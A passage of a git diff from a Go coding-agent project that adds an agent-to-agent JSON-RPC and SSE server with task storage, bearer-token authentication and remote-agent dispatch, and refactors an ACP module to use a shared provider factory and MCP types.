+		h.writeError(w, req.ID, -32000, "Task not found: "+params.TaskID)
+		return
+	}
+	w.Header().Set("Content-Type", "application/json")
+	json.NewEncoder(w).Encode(JSONRPCResponse{JSONRPC: "2.0", Result: task, ID: req.ID})
+}
+
+// handleCancelTask cancels a running task.
+func (h *Handler) handleCancelTask(w http.ResponseWriter, req *JSONRPCRequest) {
+	var params struct {
+		TaskID string `json:"task_id"`
+	}
+	if err := json.Unmarshal(req.Params, &params); err != nil {
+		h.writeError(w, req.ID, -32602, "Invalid params: "+err.Error())
+		return
+	}
+	task := h.taskStore.Get(params.TaskID)
+	if task == nil {
+		h.writeError(w, req.ID, -32000, "Task not found: "+params.TaskID)
+		return
+	}
+	if task.State != TaskStateWorking && task.State != TaskStateSubmitted {
+		h.writeError(w, req.ID, -32000, "Task cannot be canceled in state: "+string(task.State))
+		return
+	}
+	task.State = TaskStateCanceled
+	h.taskStore.Update(task)
+	w.Header().Set("Content-Type", "application/json")
+	json.NewEncoder(w).Encode(JSONRPCResponse{JSONRPC: "2.0", Result: task, ID: req.ID})
+}
+
+// Subscribe adds an SSE subscriber for task events.
+func (h *Handler) Subscribe(taskID string) chan TaskEvent {
+	ch := make(chan TaskEvent, 100)
+	h.mu.Lock()
+	h.subscribers[taskID] = append(h.subscribers[taskID], ch)
+	h.mu.Unlock()
+	return ch
+}
+
+// Unsubscribe removes an SSE subscriber.
+func (h *Handler) Unsubscribe(taskID string, ch chan TaskEvent) {
+	h.mu.Lock()
+	defer h.mu.Unlock()
+	subs := h.subscribers[taskID]
+	for i, sub := range subs {
+		if sub == ch {
+			h.subscribers[taskID] = append(subs[:i], subs[i+1:]...)
+			close(ch)
+			break
+		}
+	}
+}
+
+// broadcast sends an event to all subscribers of a task.
+func (h *Handler) broadcast(taskID string, event TaskEvent) {
+	h.mu.RLock()
+	subs := h.subscribers[taskID]
+	h.mu.RUnlock()
+	for _, ch := range subs {
+		select {
+		case ch <- event:
+		default:
+		}
+	}
+}
+
+// writeError writes a JSON-RPC error response.
+func (h *Handler) writeError(w http.ResponseWriter, id any, code int, msg string) {
+	w.Header().Set("Content-Type", "application/json")
+	json.NewEncoder(w).Encode(JSONRPCResponse{
+		JSONRPC: "2.0",
+		Error:   &JSONRPCError{Code: code, Message: msg},
+		ID:      id,
+	})
+}
+
+// writeSSE writes an SSE event.
+func (h *Handler) writeSSE(w http.ResponseWriter, flusher http.Flusher, event TaskEvent) {
+	data, _ := json.Marshal(event)
+	fmt.Fprintf(w, "data: %s\n\n", data)
+	flusher.Flush()
+}
+
+// SubscribeSSE handles SSE subscription for task events at /a2a/events.
+func (h *Handler) SubscribeSSE(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodGet {
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+	taskID := r.URL.Query().Get("task_id")
+	if taskID == "" {
+		http.Error(w, "task_id is required", http.StatusBadRequest)
+		return
+	}
+	flusher, ok := w.(http.Flusher)
+	if !ok {
+		http.Error(w, "streaming not supported", http.StatusInternalServerError)
+		return
+	}
+
+	w.Header().Set("Content-Type", "text/event-stream")
+	w.Header().Set("Cache-Control", "no-cache")
+	w.Header().Set("Connection", "keep-alive")
+
+	ch := h.Subscribe(taskID)
+	defer h.Unsubscribe(taskID, ch)
+
+	for {
+		select {
+		case <-r.Context().Done():
+			return
+		case event, ok := <-ch:
+			if !ok {
+				return
+			}
+			data, _ := json.Marshal(event)
+			fmt.Fprintf(w, "data: %s\n\n", data)
+			flusher.Flush()
+			if event.State == TaskStateCompleted || event.State == TaskStateFailed || event.State == TaskStateCanceled {
+				return
+			}
+		}
+	}
+}
diff --git a/internal/a2a/master.go b/internal/a2a/master.go
new file mode 100644
index 0000000..0c4ae08
--- /dev/null
+++ b/internal/a2a/master.go
@@ -0,0 +1,189 @@
+package a2a
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"sync"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// AgentEntry describes a remote A2A agent in a2a-list.json.
+type AgentEntry struct {
+	Name      string `json:"name"`
+	URL       string `json:"url"`
+	AuthToken string `json:"auth_token,omitempty"`
+}
+
+// AgentListConfig is the top-level structure of a2a-list.json.
+type AgentListConfig struct {
+	Agents []AgentEntry `json:"agents"`
+}
+
+// AgentListConfigPath returns the path to the global a2a-list.json.
+func AgentListConfigPath() string {
+	return filepath.Join(config.ConfigDir(), "a2a-list.json")
+}
+
+// ProjectAgentListConfigPath returns the path to the project-level .vibe/a2a-list.json.
+func ProjectAgentListConfigPath() string {
+	return filepath.Join(".vibe", "a2a-list.json")
+}
+
+// LoadAgentList loads a2a-list.json from the given path.
+func LoadAgentList(path string) (*AgentListConfig, error) {
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return nil, fmt.Errorf("read a2a-list.json: %w", err)
+	}
+	var cfg AgentListConfig
+	if err := json.Unmarshal(data, &cfg); err != nil {
+		return nil, fmt.Errorf("parse a2a-list.json: %w", err)
+	}
+	return &cfg, nil
+}
+
+// SaveAgentList writes the agent list config to a JSON file.
+func SaveAgentList(path string, cfg *AgentListConfig) error {
+	if err := os.MkdirAll(filepath.Dir(path), 0700); err != nil {
+		return fmt.Errorf("create config directory: %w", err)
+	}
+	data, err := json.MarshalIndent(cfg, "", "  ")
+	if err != nil {
+		return fmt.Errorf("marshal a2a-list config: %w", err)
+	}
+	return os.WriteFile(path, data, 0600)
+}
+
+// InitA2AMasterConfig creates a sample a2a-list.json at the default location.
+// Returns the file path. If force is false and the file already exists, returns an error.
+func InitA2AMasterConfig(force bool) (string, error) {
+	path := AgentListConfigPath()
+	if !force {
+		if _, err := os.Stat(path); err == nil {
+			return path, fmt.Errorf("a2a-list.json already exists: %s", path)
+		}
+	}
+	cfg := &AgentListConfig{
+		Agents: []AgentEntry{
+			{
+				Name:      "code-reviewer",
+				URL:       "http://localhost:8093",
+				AuthToken: "",
+			},
+			{
+				Name:      "ci-agent",
+				URL:       "http://ci-server:8093",
+				AuthToken: "change-me-to-a-random-secret",
+			},
+		},
+	}
+	if err := SaveAgentList(path, cfg); err != nil {
+		return "", err
+	}
+	return path, nil
+}
+
+// A2AManager manages a list of remote A2A agents and provides dispatch methods.
+type A2AManager struct {
+	mu      sync.RWMutex
+	entries map[string]*AgentEntry
+	order   []string
+}
+
+// NewA2AManager creates a new A2A manager from a config.
+func NewA2AManager(cfg *AgentListConfig) *A2AManager {
+	m := &A2AManager{
+		entries: make(map[string]*AgentEntry),
+	}
+	if cfg != nil {
+		for i := range cfg.Agents {
+			e := &cfg.Agents[i]
+			m.entries[e.Name] = e
+			m.order = append(m.order, e.Name)
+		}
+	}
+	return m
+}
+
+// List returns all registered agent entries in order.
+func (m *A2AManager) List() []*AgentEntry {
+	m.mu.RLock()
+	defer m.mu.RUnlock()
+	var result []*AgentEntry
+	for _, name := range m.order {
+		if e, ok := m.entries[name]; ok {
+			result = append(result, e)
+		}
+	}
+	return result
+}
+
+// Get returns an agent entry by name.
+func (m *A2AManager) Get(name string) (*AgentEntry, bool) {
+	m.mu.RLock()
+	defer m.mu.RUnlock()
+	e, ok := m.entries[name]
+	return e, ok
+}
+
+// Dispatch sends a message to the named remote A2A agent and returns the response text.
+func (m *A2AManager) Dispatch(ctx context.Context, name, message string) (string, error) {
+	m.mu.RLock()
+	entry, ok := m.entries[name]
+	m.mu.RUnlock()
+	if !ok {
+		return "", fmt.Errorf("agent '%s' not found in a2a-list", name)
+	}
+
+	client := NewClient(entry.URL, entry.AuthToken)
+	task, err := client.SendMessage(ctx, "", &Message{
+		Role:  "user",
+		Parts: []MessagePart{{Type: "text", Text: message}},
+	})
+	if err != nil {
+		return "", fmt.Errorf("dispatch to '%s': %w", name, err)
+	}
+
+	// Extract response text
+	if len(task.Artifacts) > 0 {
+		var texts []string
+		for _, a := range task.Artifacts {
+			for _, p := range a.Parts {
+				if p.Type == "text" && p.Text != "" {
+					texts = append(texts, p.Text)
+				}
+			}
+		}
+		if len(texts) > 0 {
+			return joinTexts(texts), nil
+		}
+	}
+	if task.Message != nil {
+		var texts []string
+		for _, p := range task.Message.Parts {
+			if p.Type == "text" && p.Text != "" {
+				texts = append(texts, p.Text)
+			}
+		}
+		if len(texts) > 0 {
+			return joinTexts(texts), nil
+		}
+	}
+
+	return "(no text response from agent)", nil
+}
+
+func joinTexts(texts []string) string {
+	result := ""
+	for i, t := range texts {
+		if i > 0 {
+			result += "\n"
+		}
+		result += t
+	}
+	return result
+}
diff --git a/internal/a2a/server.go b/internal/a2a/server.go
new file mode 100644
index 0000000..6526b13
--- /dev/null
+++ b/internal/a2a/server.go
@@ -0,0 +1,258 @@
+package a2a
+
+import (
+	"context"
+	"crypto/subtle"
+	"encoding/json"
+	"fmt"
+	"log"
+	"net/http"
+	"os"
+	"os/signal"
+	"syscall"
+	"time"
+)
+
+// Server is the A2A HTTP server.
+type Server struct {
+	cfg     *Config
+	version string
+	handler *Handler
+	mux     *http.ServeMux
+	httpSrv *http.Server
+	card    *AgentCard
+}
+
+// NewServer creates a new A2A server.
+func NewServer(cfg *Config, version string, executor AgentExecutor) *Server {
+	handler := NewHandler(executor)
+	mux := http.NewServeMux()
+
+	serverURL := fmt.Sprintf("http://%s", cfg.GetListenAddr())
+	card := DefaultAgentCard(version, serverURL)
+	if cfg.AgentCard != nil {
+		if cfg.AgentCard.Name != "" {
+			card.Name = cfg.AgentCard.Name
+		}
+		if cfg.AgentCard.Description != "" {
+			card.Description = cfg.AgentCard.Description
+		}
+		if cfg.AgentCard.Version != "" {
+			card.Version = cfg.AgentCard.Version
+		}
+	}
+
+	s := &Server{
+		cfg:     cfg,
+		version: version,
+		handler: handler,
+		mux:     mux,
+		card:    card,
+	}
+
+	s.registerRoutes()
+	return s
+}
+
+// GetHandler returns the A2A handler (for integration mode).
+func (s *Server) GetHandler() *Handler {
+	return s.handler
+}
+
+// GetCard returns the Agent Card.
+func (s *Server) GetCard() *AgentCard {
+	return s.card
+}
+
+// registerRoutes registers all A2A HTTP routes.
+func (s *Server) registerRoutes() {
+	// Agent Card
+	s.mux.HandleFunc("/.well-known/agent.json", HandleAgentCard(s.card))
+
+	// JSON-RPC endpoint
+	s.mux.Handle("/a2a", s.withAuth(s.handler))
+
+	// REST-style endpoints (alternative to JSON-RPC)
+	s.mux.HandleFunc("/a2a/send", s.withAuthFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != http.MethodPost {
+			http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+			return
+		}
+		isSSE := r.Header.Get("Accept") == "text/event-stream"
+		var req struct {
+			TaskID  string   `json:"task_id,omitempty"`
+			Message *Message `json:"message"`
+		}
+		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+			http.Error(w, "invalid request body", http.StatusBadRequest)
+			return
+		}
+		if req.Message == nil {
+			http.Error(w, "message is required", http.StatusBadRequest)
+			return
+		}
+		var task *Task
+		if req.TaskID != "" {
+			task = s.handler.taskStore.Get(req.TaskID)
+			if task == nil {
+				http.Error(w, "task not found", http.StatusNotFound)
+				return
+			}
+		} else {
+			task = s.handler.taskStore.Create(newTaskID())
+		}
+		task.Message = req.Message
+		task.State = TaskStateWorking
+		s.handler.taskStore.Update(task)
+		if isSSE {
+			s.handler.streamResponse(w, r, task, req.Message)
+		} else {
+			s.handler.syncResponse(w, r, task, req.Message, nil)
+		}
+	}))
+
+	s.mux.HandleFunc("/a2a/task", s.withAuthFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != http.MethodGet {
+			http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+			return
+		}
+		taskID := r.URL.Query().Get("task_id")
+		if taskID == "" {
+			http.Error(w, "task_id required", http.StatusBadRequest)
+			return
+		}
+		task := s.handler.taskStore.Get(taskID)
+		if task == nil {
+			http.Error(w, "task not found", http.StatusNotFound)
+			return
+		}
+		w.Header().Set("Content-Type", "application/json")
+		json.NewEncoder(w).Encode(task)
+	}))
+
+	s.mux.HandleFunc("/a2a/task/cancel", s.withAuthFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != http.MethodPost {
+			http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+			return
+		}
+		var req struct {
+			TaskID string `json:"task_id"`
+		}
+		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+			http.Error(w, "invalid request body", http.StatusBadRequest)
+			return
+		}
+		task := s.handler.taskStore.Get(req.TaskID)
+		if task == nil {
+			http.Error(w, "task not found", http.StatusNotFound)
+			return
+		}
+		if task.State != TaskStateWorking && task.State != TaskStateSubmitted {
+			http.Error(w, "cannot cancel task in state: "+string(task.State), http.StatusConflict)
+			return
+		}
+		task.State = TaskStateCanceled
+		s.handler.taskStore.Update(task)
+		w.Header().Set("Content-Type", "application/json")
+		json.NewEncoder(w).Encode(task)
+	}))
+
+	// SSE event stream
+	s.mux.HandleFunc("/a2a/events", s.withAuthFunc(s.handler.SubscribeSSE))
+}
+
+// RegisterRoutes registers A2A routes on an external mux (for integration mode).
+func (s *Server) RegisterRoutes(mux *http.ServeMux) {
+	mux.Handle("/.well-known/agent.json", HandleAgentCard(s.card))
+	mux.Handle("/a2a", s.withAuth(s.handler))
+	mux.HandleFunc("/a2a/events", s.withAuthFunc(s.handler.SubscribeSSE))
+}
+
+func (s *Server) withAuth(next http.Handler) http.Handler {
+	if s.cfg.AuthToken == "" {
+		return next
+	}
+	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if !validBearerToken(r, s.cfg.AuthToken) {
+			http.Error(w, "unauthorized", http.StatusUnauthorized)
+			return
+		}
+		next.ServeHTTP(w, r)
+	})
+}
+
+func (s *Server) withAuthFunc(next http.HandlerFunc) http.HandlerFunc {
+	return s.withAuth(next).ServeHTTP
+}
+
+func validBearerToken(r *http.Request, want string) bool {
+	const prefix = "Bearer "
+	auth := r.Header.Get("Authorization")
+	if len(auth) <= len(prefix) || auth[:len(prefix)] != prefix {
+		return false
+	}
+	got := auth[len(prefix):]
+	if len(got) != len(want) {
+		return false
+	}
+	return subtle.ConstantTimeCompare([]byte(got), []byte(want)) == 1
+}
+
+// Start starts the A2A server in standalone mode. Blocks until stopped.
+func (s *Server) Start() error {
+	s.httpSrv = &http.Server{
+		Addr:         s.cfg.GetListenAddr(),
+		Handler:      s.mux,
+		ReadTimeout:  30 * time.Second,
+		WriteTimeout: 300 * time.Second,
+		IdleTimeout:  120 * time.Second,
+	}
+
+	log.Printf("A2A server listening on %s", s.cfg.GetListenAddr())
+	return s.httpSrv.ListenAndServe()
+}
+
+// Stop gracefully shuts down the server.
+func (s *Server) Stop(timeout time.Duration) error {
+	if s.httpSrv == nil {
+		return nil
+	}
+	ctx, cancel := context.WithTimeout(context.Background(), timeout)
+	defer cancel()
+	return s.httpSrv.Shutdown(ctx)
+}
+
+// Run starts the A2A server in standalone mode with signal handling.
+func Run(cfg *Config, version string, executor AgentExecutor) error {
+	srv := NewServer(cfg, version, executor)
+
+	// Start server
+	errCh := make(chan error, 1)
+	go func() {
+		if err := srv.Start(); err != nil && err != http.ErrServerClosed {
+			errCh <- err
+		}
+	}()
+
+	fmt.Fprintf(os.Stderr, "VibeCoding A2A Server v%s starting\n", version)
+	fmt.Fprintf(os.Stderr, "  Endpoint: http://%s/a2a\n", cfg.GetListenAddr())
+	fmt.Fprintf(os.Stderr, "  Agent Card: http://%s/.well-known/agent.json\n", cfg.GetListenAddr())
+	fmt.Fprintf(os.Stderr, "  WorkDir: %s\n", cfg.GetWorkDir())
+	fmt.Fprintf(os.Stderr, "\nReady to serve.\n")
+
+	// Wait for interrupt
+	sigCh := make(chan os.Signal, 1)
+	signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
+
+	select {
+	case err := <-errCh:
+		return fmt.Errorf("a2a server error: %w", err)
+	case sig := <-sigCh:
+		fmt.Fprintf(os.Stderr, "\nReceived %s, shutting down...\n", sig)
+		if err := srv.Stop(10 * time.Second); err != nil {
+			log.Printf("A2A server shutdown error: %v", err)
+		}
+	}
+
+	return nil
+}
diff --git a/internal/a2a/task.go b/internal/a2a/task.go
new file mode 100644
index 0000000..95619fa
--- /dev/null
+++ b/internal/a2a/task.go
@@ -0,0 +1,190 @@
+package a2a
+
+import (
+	"crypto/rand"
+	"encoding/hex"
+	"fmt"
+	"sync"
+	"sync/atomic"
+	"time"
+)
+
+var fallbackTaskCounter uint64
+
+// TaskState represents the state of an A2A task.
+type TaskState string
+
+const (
+	TaskStateSubmitted TaskState = "submitted"
+	TaskStateWorking   TaskState = "working"
+	TaskStateCompleted TaskState = "completed"
+	TaskStateFailed    TaskState = "failed"
+	TaskStateCanceled  TaskState = "canceled"
+)
+
+// Task represents an A2A task.
+type Task struct {
+	ID        string         `json:"id"`
+	State     TaskState      `json:"state"`
+	Message   *Message       `json:"message,omitempty"`
+	Artifacts []Artifact     `json:"artifacts,omitempty"`
+	Error     *TaskError     `json:"error,omitempty"`
+	Metadata  map[string]any `json:"metadata,omitempty"`
+	CreatedAt time.Time      `json:"created_at"`
+	UpdatedAt time.Time      `json:"updated_at"`
+}
+
+// Message represents an A2A message (text or structured).
+type Message struct {
+	Role     string         `json:"role"` // "user" or "agent"
+	Parts    []MessagePart  `json:"parts"`
+	Metadata map[string]any `json:"metadata,omitempty"`
+}
+
+// MessagePart is a part of a message.
+type MessagePart struct {
+	Type string `json:"type"` // "text"
+	Text string `json:"text,omitempty"`
+}
+
+// Artifact represents output produced by an agent task.
+type Artifact struct {
+	Name        string         `json:"name,omitempty"`
+	Description string         `json:"description,omitempty"`
+	Parts       []MessagePart  `json:"parts"`
+	Metadata    map[string]any `json:"metadata,omitempty"`
+}
+
+// TaskError represents an error in task processing.
+type TaskError struct {
+	Code    int    `json:"code"`
+	Message string `json:"message"`
+}
+
+// TaskStore manages task storage.
+type TaskStore struct {
+	mu    sync.RWMutex
+	tasks map[string]*Task
+}
+
+// TaskEvent is sent via SSE for streaming task updates.
+type TaskEvent struct {
+	TaskID    string     `json:"task_id"`
+	State     TaskState  `json:"state"`
+	Message   *Message   `json:"message,omitempty"`
+	Artifact  *Artifact  `json:"artifact,omitempty"`
+	Error     *TaskError `json:"error,omitempty"`
+	Timestamp time.Time  `json:"timestamp"`
+}
+
+// NewTaskStore creates a new task store.
+func NewTaskStore() *TaskStore {
+	return &TaskStore{
+		tasks: make(map[string]*Task),
+	}
+}
+
+func newTaskID() string {
+	var b [16]byte
+	if _, err := rand.Read(b[:]); err == nil {
+		return "task_" + hex.EncodeToString(b[:])
+	}
+	n := atomic.AddUint64(&fallbackTaskCounter, 1)
+	return fmt.Sprintf("task_%d_%d", time.Now().UnixNano(), n)
+}
+
+// Create creates a new task.
+func (s *TaskStore) Create(id string) *Task {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	now := time.Now()
+	task := &Task{
+		ID:        id,
+		State:     TaskStateSubmitted,
+		CreatedAt: now,
+		UpdatedAt: now,
+		Metadata:  make(map[string]any),
+	}
+	s.tasks[id] = task
+	return task.Clone()
+}
+
+// Get returns a task by ID.
+func (s *TaskStore) Get(id string) *Task {
+	s.mu.RLock()
+	defer s.mu.RUnlock()
+	task := s.tasks[id]
+	if task == nil {
+		return nil
+	}
+	return task.Clone()
+}
+
+// Update updates a task.
+func (s *TaskStore) Update(task *Task) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	copy := task.Clone()
+	copy.UpdatedAt = time.Now()
+	s.tasks[copy.ID] = copy
+}
+
+// SetState updates the task state.
+func (s *TaskStore) SetState(id string, state TaskState) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	if task, ok := s.tasks[id]; ok {
+		task.State = state
+		task.UpdatedAt = time.Now()
+	}
+}
+
+// Clone returns a deep copy of the task value.
+func (t *Task) Clone() *Task {
+	if t == nil {
+		return nil
+	}
+	copy := *t
+	copy.Message = cloneMessage(t.Message)
+	if len(t.Artifacts) > 0 {
+		copy.Artifacts = make([]Artifact, len(t.Artifacts))
+		for i := range t.Artifacts {
+			copy.Artifacts[i] = cloneArtifact(t.Artifacts[i])
+		}
+	}
+	if t.Error != nil {
+		errCopy := *t.Error
+		copy.Error = &errCopy
+	}
+	copy.Metadata = cloneMap(t.Metadata)
+	return &copy
+}
+
+func cloneMessage(msg *Message) *Message {
+	if msg == nil {
+		return nil
+	}
+	copy := *msg
+	copy.Parts = append([]MessagePart(nil), msg.Parts...)
+	copy.Metadata = cloneMap(msg.Metadata)
+	return &copy
+}
+
+func cloneArtifact(artifact Artifact) Artifact {
+	copy := artifact
+	copy.Parts = append([]MessagePart(nil), artifact.Parts...)
+	copy.Metadata = cloneMap(artifact.Metadata)
+	return copy
+}
+
+func cloneMap(m map[string]any) map[string]any {
+	if len(m) == 0 {
+		return nil
+	}
+	copy := make(map[string]any, len(m))
+	for k, v := range m {
+		copy[k] = v
+	}
+	return copy
+}
diff --git a/internal/acp/acp.go b/internal/acp/acp.go
index 9e773be..fe26b63 100644
--- a/internal/acp/acp.go
+++ b/internal/acp/acp.go
@@ -2,6 +2,7 @@ package acp
 
 import (
 	"bufio"
+	"bytes"
 	"context"
 	"encoding/json"
 	"fmt"
@@ -12,13 +13,14 @@ import (
 	"sync"
 	"time"
 
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
 	"github.com/startvibecoding/vibecoding/internal/agent"
 	"github.com/startvibecoding/vibecoding/internal/config"
 	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
 	"github.com/startvibecoding/vibecoding/internal/contextfiles"
+	"github.com/startvibecoding/vibecoding/internal/mcp"
 	"github.com/startvibecoding/vibecoding/internal/provider"
-	"github.com/startvibecoding/vibecoding/internal/provider/anthropic"
-	"github.com/startvibecoding/vibecoding/internal/provider/openai"
+	providerfactory "github.com/startvibecoding/vibecoding/internal/provider/factory"
 	"github.com/startvibecoding/vibecoding/internal/sandbox"
 	"github.com/startvibecoding/vibecoding/internal/session"
 	"github.com/startvibecoding/vibecoding/internal/skills"
@@ -26,15 +28,18 @@ import (
 )
 
 const protocolVersion = 1
+const maxRequestBytes = 10 << 20
 
 type RunOptions struct {
-	Provider string
-	Model    string
-	Mode     string
-	Thinking string
-	Sandbox  bool
-	Verbose  bool
-	Debug    bool
+	Provider   string
+	Model      string
+	Mode       string
+	Thinking   string
+	Sandbox    bool
+	Verbose    bool
+	Debug      bool
+	MultiAgent bool
+	WebSearch  bool
 }
 
 type server struct {
@@ -54,25 +59,33 @@ type server struct {
 	extraContext  string
 	contextFiles  string
 
+	multiAgent bool
+	factory    *agent.AgentFactory
+	agentMgr   *agent.AgentManager
+
 	sessions map[string]*sessionRuntime
 	pending  map[string]chan json.RawMessage
 
 	toolTitles map[string]string
+	mcpNotify  map[string]bool
 
 	nextID int64
 	r      *bufio.Reader
 	w      io.Writer
+
+	permissionTimeout time.Duration
 }
 
 type sessionRuntime struct {
 	id       string
 	mgr      *session.Manager
-	agent    *agent.Agent
+	agent    agentpkg.Agent
 	registry *tools.Registry
 	cancel   context.CancelFunc
 	promptID string
 	cancelMu sync.Mutex
-	mcp      []*mcpClient
+	mcp      []*mcp.Client
+	agentMgr *agent.AgentManager
 }
 
 type rpcRequest struct {
@@ -88,13 +101,7 @@ type rpcResponse struct {
 	JSONRPC string          `json:"jsonrpc"`
 	ID      json.RawMessage `json:"id,omitempty"`
 	Result  any             `json:"result,omitempty"`
-	Error   *rpcError       `json:"error,omitempty"`
-}
-
-type rpcError struct {
-	Code    int    `json:"code"`
-	Message string `json:"message"`
-	Data    any    `json:"data,omitempty"`
+	Error   *mcp.RPCError   `json:"error,omitempty"`
 }
 
 type clientInfo struct {
@@ -136,8 +143,8 @@ type sessionCaps struct {
 }
 
 type newSessionRequest struct {
-	Cwd        string            `json:"cwd"`
-	McpServers []mcpServerConfig `json:"mcpServers,omitempty"`
+	Cwd        string             `json:"cwd"`
+	McpServers []mcp.ServerConfig `json:"mcpServers,omitempty"`
 }
 
 type newSessionResult struct {
@@ -145,9 +152,9 @@ type newSessionResult struct {
 }
 
 type loadSessionRequest struct {
-	SessionID  string            `json:"sessionId"`
-	Cwd        string            `json:"cwd"`
-	McpServers []mcpServerConfig `json:"mcpServers,omitempty"`
+	SessionID  string             `json:"sessionId"`
+	Cwd        string             `json:"cwd"`
+	McpServers []mcp.ServerConfig `json:"mcpServers,omitempty"`
 }
 
 type promptRequest struct {
@@ -224,6 +231,9 @@ func Run(opts RunOptions) error {
 	if err != nil {
 		return fmt.Errorf("load settings: %w", err)
 	}
+	if opts.WebSearch {
+		settings.WebSearch.Enabled = config.BoolPtr(true)
+	}
 
 	cwd, err := os.Getwd()
 	if err != nil {
@@ -233,9 +243,11 @@ func Run(opts RunOptions) error {
 	srv := &server{
 		settings:   settings,
 		cwd:        cwd,
+		multiAgent: opts.MultiAgent,
 		sessions:   make(map[string]*sessionRuntime),
 		pending:    make(map[string]chan json.RawMessage),
 		toolTitles: make(map[string]string),
+		mcpNotify:  make(map[string]bool),
 		r:          bufio.NewReader(os.Stdin),
 		w:          os.Stdout,
 	}
@@ -291,16 +303,36 @@ func Run(opts RunOptions) error {
 		srv.extraContext = ctx + skillsMgr.BuildAllSkillsContext()
 	}
 
+	// Multi-agent mode: create AgentFactory and AgentManager
+	if opts.MultiAgent {
+		compactionSettings := ctxpkg.CompactionSettings{
+			Enabled:          settings.Compaction.Enabled,
+			ReserveTokens:    settings.Compaction.ReserveTokens,
+			KeepRecentTokens: settings.Compaction.KeepRecentTokens,
+		}
+		if compactionSettings.ReserveTokens == 0 {
+			compactionSettings.ReserveTokens = 16384
+		}
+		if compactionSettings.KeepRecentTokens == 0 {
+			compactionSettings.KeepRecentTokens = 20000
+		}
+
+		srv.factory = agent.NewAgentFactory(p, model, settings, sbMgr, srv.extraContext, compactionSettings, nil)
+		srv.agentMgr = agent.NewAgentManager(srv.factory)
+	}
+
 	for {
 		req, err := srv.readRequest()
 		if err != nil {
 			if err == io.EOF {
 				return nil
 			}
-			srv.writeMessage(map[string]any{
+			if err := srv.writeMessage(map[string]any{
 				"jsonrpc": "2.0",
-				"error":   &rpcError{Code: -32700, Message: err.Error()},
-			})
+				"error":   &mcp.RPCError{Code: -32700, Message: err.Error()},
+			}); err != nil {
+				return err
+			}
 			continue
 		}
 
@@ -322,118 +354,32 @@ func Run(opts RunOptions) error {
 			srv.handleCancel(req)
 		default:
 			if len(req.ID) > 0 {
-				srv.writeResponse(req.ID, nil, &rpcError{Code: -32601, Message: "method not found"})
+				srv.writeResponse(req.ID, nil, &mcp.RPCError{Code: -32601, Message: "method not found"})
 			}
 		}
 	}
 }
 
 func createProvider(settings *config.Settings, providerName, modelID string) (provider.Provider, *provider.Model, error) {
-	if providerName == "" {
-		providerName = settings.DefaultProvider
-	}
-	if modelID == "" {
-		modelID = settings.DefaultModel
-	}
-	pc := settings.GetProviderConfig(providerName)
-	if pc != nil {
-		apiKey := settings.ResolveKey(providerName)
-		models := convertModelConfigs(providerName, pc.Models)
-		api := pc.API
-		if api == "" {
-			if strings.Contains(strings.ToLower(pc.BaseURL), "anthropic") {
-				api = "anthropic-messages"
-			} else {
-				api = "openai-chat"
-			}
-		}
-		var p provider.Provider
-		switch api {
-		case "anthropic-messages":
-			ap := anthropic.NewProviderWithModels(apiKey, pc.BaseURL, models)
-			if pc.ThinkingFormat != "" {
-				ap.SetThinkingFormat(pc.ThinkingFormat)
-			}
-			if pc.CacheControl != nil {
-				ap.SetCacheControlEnabled(pc.CacheControl)
-			}
-			p = ap
-		case "openai-chat", "openai":
-			op := openai.NewProviderWithModels(apiKey, pc.BaseURL, models)
-			if pc.ThinkingFormat != "" {
-				op.SetThinkingFormat(pc.ThinkingFormat)
-			}
-			p = op
-		default:
-			return nil, nil, fmt.Errorf("unsupported API type: %s", api)
-		}
-		model := p.GetModel(modelID)
-		if model == nil {
-			if len(models) > 0 {
-				model = models[0]
-			} else {
-				return nil, nil, fmt.Errorf("no models configured for provider %s", providerName)
-			}
-		}
-		return p, model, nil
-	}
-	var p provider.Provider
-	switch strings.ToLower(providerName) {
-	case "openai":
-		p = openai.NewProvider(settings.ResolveKey(providerName), "")
-	case "anthropic":
-		p = anthropic.NewProvider(settings.ResolveKey(providerName), "")
-	default:
-		return nil, nil, fmt.Errorf("unknown provider: %s", providerName)
-	}
-	model := p.GetModel(modelID)
-	if model == nil {
-		models := p.Models()
-		if len(models) > 0 {
-			model = models[0]
-		} else {
-			return nil, nil, fmt.Errorf("no models available for provider %s", providerName)
-		}
-	}
-	return p, model, nil
-}
-
-func convertModelConfigs(providerName string, models []config.ModelConfig) []*provider.Model {
-	var result []*provider.Model
-	for _, m := range models {
-		input := m.Input
-		if len(input) == 0 {
-			input = []string{"text"}
-		}
-		var cost provider.ModelPricing
-		if m.Cost != nil {
-			cost = provider.ModelPricing{
-				Input:      m.Cost.Input,
-				Output:     m.Cost.Output,
-				CacheRead:  m.Cost.CacheRead,
-				CacheWrite: m.Cost.CacheWrite,
-			}
-		}
-		result = append(result, &provider.Model{
-			ID:            m.ID,
-			Name:          m.Name,
-			Provider:      providerName,
-			Reasoning:     m.Reasoning,
-			Input:         input,
-			Cost:          cost,
-			ContextWindow: m.ContextWindow,
-			MaxTokens:     m.MaxTokens,
-		})
-	}
-	return result
+	enabled := true
+	return providerfactory.CreateWithOptions(settings, providerName, modelID, providerfactory.Options{
+		BuiltinAnthropicCacheControl: &enabled,
+	})
 }
 
 func (s *server) newToolRegistry() *tools.Registry {
 	registry := tools.NewRegistry(s.cwd, s.sbMgr.GetActive())
-	registry.RegisterDefaults()
+	registry.RegisterDefaultsWithPlanTool(s.settings.IsPlanToolEnabled())
 	if s.skillsMgr != nil {
